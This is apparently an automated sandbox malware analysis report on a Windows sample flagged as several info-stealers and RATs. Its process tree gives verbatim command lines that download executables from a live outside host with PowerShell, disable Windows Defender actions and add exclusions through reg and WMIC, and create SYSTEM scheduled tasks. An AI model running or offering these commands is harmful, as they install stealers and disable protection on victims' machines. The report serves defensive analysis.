Edit tour
Windows
Analysis Report
file.exe
Overview
General Information
Detection
Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sigma detected: Set custom UserAgent and download file via Powershell
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Mars stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected SectopRAT
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
Yara detected Vidar stealer
Yara detected zgRAT
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Connects to many ports of the same IP (likely port scanning)
Creates files in the recycle bin to hide itself
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking locale)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies Group Policy settings
Modifies Windows Defender protection settings
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell DownloadFile
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious desktop.ini Action
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- file.exe (PID: 1900 cmdline:
"C:\Users\ user\Deskt op\file.ex e" MD5: 705685A8DEACE858E7FC849471C045F3) - cmd.exe (PID: 1048 cmdline:
"cmd" /c " C:\Users\u ser\AppDat a\Local\Te mp\nsvE79C .tmp\lood. bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3348 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5428 cmdline:
powershell -Command "(New-Obje ct Net.Web Client).Do wnloadFile ('https:// d68kcn56pz fb4.cloudf ront.net/l oad/th.php ?c=1000',' stat')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - powershell.exe (PID: 5268 cmdline:
powershell -Command "(New-Obje ct Net.Web Client).Do wnloadFile ('https:// d68kcn56pz fb4.cloudf ront.net/l oad/dl.php ?id=425&c= 1000','i1. exe')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - WerFault.exe (PID: 5560 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -pss -s 464 -p 38 08 -ip 380 8 MD5: C31336C1EFC2CCB44B4326EA793040F2) - i1.exe (PID: 3808 cmdline:
i1.exe /SU B=2838 /st r=one MD5: 22B610EEDBB3591F31508E1912ED5B01) - u2xs.0.exe (PID: 5788 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\u2xs.0 .exe" MD5: BE531DFDB40E97826D86E1FB73FA73C8) - run.exe (PID: 4820 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\u2xs.2 \run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334) - cmd.exe (PID: 5616 cmdline:
C:\Windows \SysWOW64\ cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4220 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - MSBuild.exe (PID: 5860 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\MSBu ild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232) - u2xs.3.exe (PID: 6972 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\u2xs.3 .exe" MD5: 397926927BCA55BE4A77839B1C44DE6E) - WerFault.exe (PID: 5560 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 3 808 -s 193 6 MD5: C31336C1EFC2CCB44B4326EA793040F2) - powershell.exe (PID: 6980 cmdline:
powershell -command "$cli = Ne w-Object S ystem.Net. WebClient; $cli.Heade rs['User-A gent'] = ' InnoDownlo adPlugin/1 .5';$cli.D ownloadFil e('https:/ /d68kcn56p zfb4.cloud front.net/ load/dl.ph p?id=444', 'i2.bat') " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - powershell.exe (PID: 6188 cmdline:
powershell -Command "(New-Obje ct Net.Web Client).Do wnloadFile ('https:// d68kcn56pz fb4.cloudf ront.net/l oad/dl.php ?id=456',' i3.exe')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - i3.exe (PID: 4088 cmdline:
i3.exe MD5: DA30CEE1E6389704275CA7868FC7AD1F) - Install.exe (PID: 6036 cmdline:
.\Install. exe /Bdidl g "385128" /S MD5: 90487EB500021DBCB9443A2CF972A204) - cmd.exe (PID: 1888 cmdline:
"C:\Window s\System32 \cmd.exe" /C forfile s /p c:\wi ndows\syst em32 /m wh ere.exe /c "cmd /C r eg add \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v 214 7735503 /t REG_SZ /d 6" & forf iles /p c: \windows\s ystem32 /m calc.exe /c "cmd /C reg add \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v 2 147814524 /t REG_SZ /d 6" & fo rfiles /p c:\windows \system32 /m where.e xe /c "cmd /C reg ad d \"HKLM\S OFTWARE\Po licies\Mic rosoft\Win dows Defen der\Threat s\ThreatID DefaultAct ion\" /f / v 21477801 99 /t REG_ SZ /d 6" & forfiles /p c:\wind ows\system 32 /m wait for.exe /c "cmd /C r eg add \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v 214 7812831 /t REG_SZ /d 6" & forf iles /p c: \windows\s ystem32 /m help.exe /c "cmd /C powershel l start-pr ocess -Win dowStyle H idden gpup date.exe / force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6084 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - forfiles.exe (PID: 7416 cmdline:
forfiles / p c:\windo ws\system3 2 /m where .exe /c "c md /C reg add \"HKLM \SOFTWARE\ Policies\M icrosoft\W indows Def ender\Thre ats\Threat IDDefaultA ction\" /f /v 214773 5503 /t RE G_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 7440 cmdline:
/C reg add "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Threats\ ThreatIDDe faultActio n" /f /v 2 147735503 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 7456 cmdline:
reg add "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction" /f /v 2147 735503 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - forfiles.exe (PID: 7532 cmdline:
forfiles / p c:\windo ws\system3 2 /m calc. exe /c "cm d /C reg a dd \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v 2147814 524 /t REG _SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 7560 cmdline:
/C reg add "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Threats\ ThreatIDDe faultActio n" /f /v 2 147814524 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 7576 cmdline:
reg add "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction" /f /v 2147 814524 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - forfiles.exe (PID: 7888 cmdline:
forfiles / p c:\windo ws\system3 2 /m where .exe /c "c md /C reg add \"HKLM \SOFTWARE\ Policies\M icrosoft\W indows Def ender\Thre ats\Threat IDDefaultA ction\" /f /v 214778 0199 /t RE G_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 7900 cmdline:
/C reg add "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Threats\ ThreatIDDe faultActio n" /f /v 2 147780199 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 7920 cmdline:
reg add "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction" /f /v 2147 780199 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - forfiles.exe (PID: 8004 cmdline:
forfiles / p c:\windo ws\system3 2 /m waitf or.exe /c "cmd /C re g add \"HK LM\SOFTWAR E\Policies \Microsoft \Windows D efender\Th reats\Thre atIDDefaul tAction\" /f /v 2147 812831 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 8036 cmdline:
/C reg add "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Threats\ ThreatIDDe faultActio n" /f /v 2 147812831 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 8060 cmdline:
reg add "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction" /f /v 2147 812831 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - forfiles.exe (PID: 8156 cmdline:
forfiles / p c:\windo ws\system3 2 /m help. exe /c "cm d /C power shell star t-process -WindowSty le Hidden gpupdate.e xe /force" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 8184 cmdline:
/C powersh ell start- process -W indowStyle Hidden gp update.exe /force MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - powershell.exe (PID: 1520 cmdline:
powershell start-pr ocess -Win dowStyle H idden gpup date.exe / force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - gpupdate.exe (PID: 8052 cmdline:
"C:\Window s\system32 \gpupdate. exe" /forc e MD5: 6DC3720EA74B49C8ED64ACA3E0162AC8) - conhost.exe (PID: 5744 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - forfiles.exe (PID: 7948 cmdline:
"C:\Window s\System32 \forfiles. exe" /p c: \windows\s ystem32 /m where.exe /c "cmd / C powershe ll -Window Style Hidd en WMIC /N AMESPACE:\ \root\Micr osoft\Wind ows\Defend er PATH MS FT_MpPrefe rence call Add Exclu sionExtens ion=exe Fo rce=True" MD5: D95C443851F70F77427B3183B1619DD3) - conhost.exe (PID: 7956 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7996 cmdline:
/C powersh ell -Windo wStyle Hid den WMIC / NAMESPACE: \\root\Mic rosoft\Win dows\Defen der PATH M SFT_MpPref erence cal l Add Excl usionExten sion=exe F orce=True MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - powershell.exe (PID: 8028 cmdline:
powershell -WindowSt yle Hidden WMIC /NAM ESPACE:\\r oot\Micros oft\Window s\Defender PATH MSFT _MpPrefere nce call A dd Exclusi onExtensio n=exe Forc e=True MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - WMIC.exe (PID: 8148 cmdline:
"C:\Window s\System32 \Wbem\WMIC .exe" /NAM ESPACE:\\r oot\Micros oft\Window s\Defender PATH MSFT _MpPrefere nce call A dd Exclusi onExtensio n=exe Forc e=True MD5: E2DE6500DE1148C7F6027AD50AC8B891) - WmiPrvSE.exe (PID: 7564 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - schtasks.exe (PID: 7568 cmdline:
schtasks / CREATE /TN "biPxHmUL FllsbMgnpt " /SC once /ST 17:12 :00 /RU "S YSTEM" /TR "\"C:\Use rs\user\Ap pData\Loca l\Temp\7zS 5A79.tmp\I nstall.exe \" Wt /gCs didCeBm 38 5128 /S" / V1 /F MD5: 48C2FE20575769DE916F48EF0676A965) - conhost.exe (PID: 7560 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - forfiles.exe (PID: 356 cmdline:
"C:\Window s\System32 \forfiles. exe" /p c: \windows\s ystem32 /m waitfor.e xe /c "cmd /C schtas ks /run /I /tn biPxH mULFllsbMg npt" MD5: D95C443851F70F77427B3183B1619DD3) - conhost.exe (PID: 7536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7920 cmdline:
/C schtask s /run /I /tn biPxHm ULFllsbMgn pt MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - schtasks.exe (PID: 920 cmdline:
schtasks / run /I /tn biPxHmULF llsbMgnpt MD5: 48C2FE20575769DE916F48EF0676A965)
- chrome.exe (PID: 4416 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 6252 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2320 --fi eld-trial- handle=220 0,i,178118 4080550172 2127,12993 2798271005 68495,2621 44 --disab le-feature s=Optimiza tionGuideM odelDownlo ading,Opti mizationHi nts,Optimi zationHint sFetching, Optimizati onTargetPr ediction / prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- svchost.exe (PID: 5548 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- Install.exe (PID: 1504 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\7zS5A79 .tmp\Insta ll.exe Wt /gCsdidCeB m 385128 / S MD5: 90487EB500021DBCB9443A2CF972A204) - cmd.exe (PID: 7464 cmdline:
"C:\Window s\System32 \cmd.exe" /C forfile s /p c:\wi ndows\syst em32 /m wh ere.exe /c "cmd /C r eg add \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v 214 7735503 /t REG_SZ /d 6" & forf iles /p c: \windows\s ystem32 /m calc.exe /c "cmd /C reg add \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v 2 147814524 /t REG_SZ /d 6" & fo rfiles /p c:\windows \system32 /m where.e xe /c "cmd /C reg ad d \"HKLM\S OFTWARE\Po licies\Mic rosoft\Win dows Defen der\Threat s\ThreatID DefaultAct ion\" /f / v 21477801 99 /t REG_ SZ /d 6" & forfiles /p c:\wind ows\system 32 /m wait for.exe /c "cmd /C r eg add \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v 214 7812831 /t REG_SZ /d 6" & forf iles /p c: \windows\s ystem32 /m help.exe /c "cmd /C powershel l start-pr ocess -Win dowStyle H idden gpup date.exe / force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7460 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - forfiles.exe (PID: 2380 cmdline:
forfiles / p c:\windo ws\system3 2 /m where .exe /c "c md /C reg add \"HKLM \SOFTWARE\ Policies\M icrosoft\W indows Def ender\Thre ats\Threat IDDefaultA ction\" /f /v 214773 5503 /t RE G_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 1868 cmdline:
/C reg add "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Threats\ ThreatIDDe faultActio n" /f /v 2 147735503 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 3848 cmdline:
reg add "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction" /f /v 2147 735503 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - powershell.exe (PID: 1020 cmdline:
powershell "cmd /C R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 25451\" /t REG_SZ /d 6 /reg:32 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "225451\" /t REG_SZ /d 6 /reg: 64;REG ADD \"HKLM\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er\Threats \ThreatIDD efaultActi on\" /f /v \"256596\ " /t REG_S Z /d 6 /re g:32;REG A DD \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v \"25659 6\" /t REG _SZ /d 6 / reg:64;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"242 872\" /t R EG_SZ /d 6 /reg:32;R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 42872\" /t REG_SZ /d 6 /reg:64 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "214774937 3\" /t REG _SZ /d 6 / reg:32;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"214 7749373\" /t REG_SZ /d 6 /reg: 64;REG ADD \"HKLM\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er\Threats \ThreatIDD efaultActi on\" /f /v \"2147807 942\" /t R EG_SZ /d 6 /reg:32;R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 147807942\ " /t REG_S Z /d 6 /re g:64;REG A DD \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v \"21477 35735\" /t REG_SZ /d 6 /reg:32 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "214773573 5\" /t REG _SZ /d 6 / reg:64;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"214 7737010\" /t REG_SZ /d 6 /reg: 32;REG ADD \"HKLM\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er\Threats \ThreatIDD efaultActi on\" /f /v \"2147737 010\" /t R EG_SZ /d 6 /reg:64;R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 147737007\ " /t REG_S Z /d 6 /re g:32;REG A DD \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v \"21477 37007\" /t REG_SZ /d 6 /reg:64 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "214773750 3\" /t REG _SZ /d 6 / reg:32;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"214 7737503\" /t REG_SZ /d 6 /reg: 64;REG ADD \"HKLM\SO FTWARE\Pol